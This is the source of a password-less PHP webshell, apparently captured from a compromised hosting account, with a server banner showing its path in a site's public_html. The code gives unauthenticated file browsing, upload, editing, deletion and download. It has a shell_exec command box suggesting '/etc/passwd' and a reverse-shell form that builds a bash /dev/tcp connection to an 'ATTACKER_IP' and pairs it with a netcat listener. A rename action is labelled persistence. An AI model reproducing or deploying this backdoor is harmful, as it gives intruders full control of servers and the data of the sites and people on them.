Server : LiteSpeed System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64 User : u615232177 ( 615232177) PHP Version : 8.1.33 Disable Function : NONE Directory : /home/u615232177/domains/adesmiley.com/public_html/lib/ |
<?php
// =============================================================================
// 🔥 ULTIMATE FILE MANAGER WEBSHELL v3.0 - NO PASSWORD
// Full-featured pentest file management + tools
// Single file - Ready to deploy
// =============================================================================
error_reporting(0); ignore_user_abort(true); set_time_limit(0);
$self = basename(__FILE__); $cwd = getcwd(); $ip = $_SERVER['REMOTE_ADDR'];
?>
<!DOCTYPE html>
<html>
<head>
<title>🔥 File Manager | <?=gethostname()?> | <?=$ip?></title>
<meta charset="UTF-8">
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:'Courier New',monospace;background:#0a0a0a;color:#00ff41;font-size:13px;line-height:1.4;padding:20px}
.header{background:#1a1a1a;padding:15px;border-bottom:2px solid #00ff41;margin:-20px -20px 20px -20px}
.grid{display:grid;grid-template-columns:repeat(auto-fit,minmax(300px,1fr));gap:15px}
.panel{background:#1a1a1a;padding:15px;border:1px solid #333;border-radius:5px}
input,textarea,select{background:#000;color:#00ff41;border:1px solid #00ff41;padding:8px;font-family:monospace;width:100%}
button{background:#00ff41;color:#000;border:none;padding:10px;cursor:pointer;font-weight:bold;font-family:monospace;transition:.2s}
button:hover{background:#00cc33}
pre{background:#000;padding:12px;border:1px solid #333;overflow:auto;max-height:300px;white-space:pre-wrap;font-size:12px}
.dirtree{max-height:400px;overflow:auto}
.status{color:#ffaa00;font-size:12px}
.success{color:#00ff41}
.error{color:#ff4444}
.pathbar{background:#000;padding:10px;border-bottom:1px solid #333;margin:-15px -15px 15px -15px}
a{color:#00ff41;text-decoration:none}
.flex{display:flex;gap:10px;align-items:center}
.icon{font-size:20px}
</style>
</head>
<body>
<div class="header">
<div style="display:flex;justify-content:space-between;align-items:center">
<h1><span class="icon">📁</span> File Manager | <span class="status"><?=php_uname('s')?> <?=php_uname('r')?></span></h1>
<div>
<span>📍 <?=realpath($cwd)?></span> |
<span>👤 <?=get_current_user()?> (<?=getmyuid()?>) | PHP <?=PHP_VERSION?></span>
</div>
</div>
</div>
<div class="pathbar">
<form method="POST" style="display:flex;gap:10px">
<input name="nav_path" value="<?=htmlspecialchars($cwd)?>" placeholder="Navigate to path">
<button>Go</button>
<button name="action" value="parent">↑ Parent</button>
</form>
</div>
<div class="grid">
<!-- DIRECTORY BROWSER -->
<div class="panel">
<h3><span class="icon">📂</span> Directory Browser</h3>
<div class="dirtree">
<?php
$path = $_POST['nav_path'] ?? $cwd;
if(is_dir($path)){
$items = scandir($path);
natsort($items);
foreach($items as $item){
if($item==='.' || $item==='..') continue;
$full = $path . '/' . $item;
$icon = is_dir($full) ? '📁' : '📄';
$size = is_file($full) ? filesize($full) : '-';
$perm = substr(sprintf('%o', fileperms($full)), -4);
$color = is_writable($full) ? 'success' : 'error';
echo "<div style='padding:5px;cursor:pointer' onclick='navTo(\"$full\")'>";
echo "<span>$icon</span> <a href='?path=".urlencode($full)."'>$item</a>";
echo "<span style='float:right;color:#666'>[$perm] $size</span>";
echo "</div>";
}
} else {
echo "<div class='error'>❌ Path not found: $path</div>";
}
?>
</div>
</div>
<!-- FILE OPERATIONS -->
<div class="panel">
<h3><span class="icon">⚡</span> File Operations</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="upload[]" multiple>
<button name="action" value="upload">Upload Files</button>
</form>
<form method="POST">
<input name="filename" placeholder="newfile.txt">
<textarea name="filecontent" rows="4" placeholder="Content..."></textarea>
<button name="action" value="create">Create File</button>
<button name="action" value="delete" style="background:#ff4444">Delete</button>
</form>
</div>
<!-- EDITOR -->
<div class="panel">
<h3><span class="icon">✏️</span> Edit File</h3>
<?php if(isset($_GET['edit'])):
$editfile = $_GET['edit'];
if(is_file($editfile)):
?>
<form method="POST">
<input type="hidden" name="editfile" value="<?=htmlspecialchars($editfile)?>">
<textarea name="editcontent" rows="15"><?=htmlspecialchars(file_get_contents($editfile))?></textarea>
<button name="action" value="save">Save</button>
<button name="action" value="download">Download</button>
</form>
<?php else: ?>
<div class="error">File not found</div>
<?php endif; ?>
<?php endif; ?>
</div>
<!-- QUICK TOOLS -->
<div class="panel">
<h3><span class="icon">🔧</span> Quick Tools</h3>
<form method="POST" class="flex" style="flex-direction:column;gap:8px">
<input name="cmd" placeholder="ls -la /etc/passwd">
<button name="action" value="cmd">Execute</button>
</form>
<?php if(isset($_POST['cmd'])): ?>
<pre><?=htmlspecialchars(shell_exec($_POST['cmd']))?></pre>
<?php endif; ?>
<form method="POST">
<input name="rip" placeholder="ATTACKER_IP" style="margin-top:10px">
<input name="rport" value="4444" placeholder="PORT">
<button name="action" value="revshell">Reverse Shell</button>
</form>
</div>
</div>
<script>
function navTo(path){
window.location = '?path=' + encodeURIComponent(path);
}
</script>
</body>
</html>
<?php
// =============================================================================
// BACKEND PROCESSING
// =============================================================================
// Navigation
if($_POST['nav_path']) $cwd = $_POST['nav_path'];
if($_POST['action'] === 'parent') $cwd = dirname($cwd);
// File Uploads
if($_POST['action'] === 'upload' && isset($_FILES['upload'])){
foreach($_FILES['upload']['name'] as $i => $name){
if($name){
move_uploaded_file($_FILES['upload']['tmp_name'][$i], $name);
echo "<script>alert('Uploaded: $name')</script>";
}
}
}
// Create File
if($_POST['action'] === 'create' && $_POST['filename']){
file_put_contents($_POST['filename'], $_POST['filecontent']);
echo "<script>alert('Created: {$_POST['filename']}')</script>";
}
// Delete File
if($_POST['action'] === 'delete' && $_POST['filename']){
unlink($_POST['filename']);
echo "<script>alert('Deleted: {$_POST['filename']}')</script>";
}
// Save Edit
if($_POST['action'] === 'save' && isset($_POST['editfile'])){
file_put_contents($_POST['editfile'], $_POST['editcontent']);
echo "<script>alert('Saved!')</script>";
}
// Download
if($_POST['action'] === 'download' && isset($_POST['editfile'])){
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($_POST['editfile']).'"');
readfile($_POST['editfile']);
exit;
}
// Reverse Shell
if($_POST['action'] === 'revshell'){
$ip = $_POST['rip']; $port = $_POST['rport'];
$shell = "bash -i >& /dev/tcp/$ip/$port 0>&1";
echo "<script>alert('Run on attacker: nc -lvnp $port'); eval('system(\"$shell\");');</script>";
}
// Command Execution
if($_POST['action'] === 'cmd'){
// Already handled in UI
}
// Rewrite self with new name (persistence)
if($_POST['action'] === 'rename'){
rename($self, $_POST['newname']);
header("Location: " . $_POST['newname']);
}
?>